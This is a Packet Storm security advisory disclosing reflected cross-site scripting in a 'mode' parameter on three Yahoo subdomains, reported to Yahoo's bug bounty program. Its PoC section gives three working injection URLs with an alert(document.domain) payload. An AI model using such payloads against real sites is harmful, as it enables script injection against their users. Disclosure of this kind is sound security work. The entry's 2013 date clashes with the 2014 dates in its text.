Yahoo mode Cross Site Scripting

2013-03-09T00:00:00
ID PACKETSTORM:125615
Type packetstorm
Reporter Stefan Schurtz
Modified 2013-03-09T00:00:00

Description

                                        
                                            `  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
In Jan ?14 I reported three Cross-site Scripting vulnerabilities to the  
Yahoo Bug Bounty Program. And I know, it is really really hard, but ...  
again ... no feedback or bounty :)  
  
Advisory: Yahoo Bug Bounty Program Vulnerability #4  
#5 #6 Cross-site Scripting vulnerabilities  
Advisory ID: SSCHADV2014-YahooBB-004 / YahooBB-005 /  
YahooBB-006  
Author: Stefan Schurtz  
Affected Software: Successfully tested on celebrity.yahoo.com,  
movies.yahoo.com, music.yahoo.com  
Vendor URL: http://yahoo.com/  
Vendor Status: Not tested anymore  
Bounty: nothing  
  
==========================  
Vulnerability Description  
==========================  
  
The 'mode'-Paramter on "https://celebrity.yahoo.com/",  
"https://movies.yahoo.com/", "https://music.yahoo.com/" is prone to a  
Cross-site Scripting vulnerability  
  
==========================  
PoC-Exploit  
==========================  
  
http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index  
  
http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index  
  
http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=  
mode=multipart"-alert(document.domain)-"&__phase=pre&type=index  
  
==========================  
Disclosure Timeline  
==========================  
  
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)  
  
==========================  
Credits  
==========================  
  
Vulnerabilities found and advisory written by Stefan Schurtz.  
  
==========================  
References  
==========================  
  
http://yahoo.com/  
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt  
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt  
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.12 (GNU/Linux)  
  
iEYEARECAAYFAlMa8HkACgkQg3svV2LcbMBo9gCeIc8L/kBFOjdNV8J3pmY65UwV  
oFwAn3WBJHwesMpMzG4Z1qxTA10c9sZ0  
=+fff  
-----END PGP SIGNATURE-----  
  
`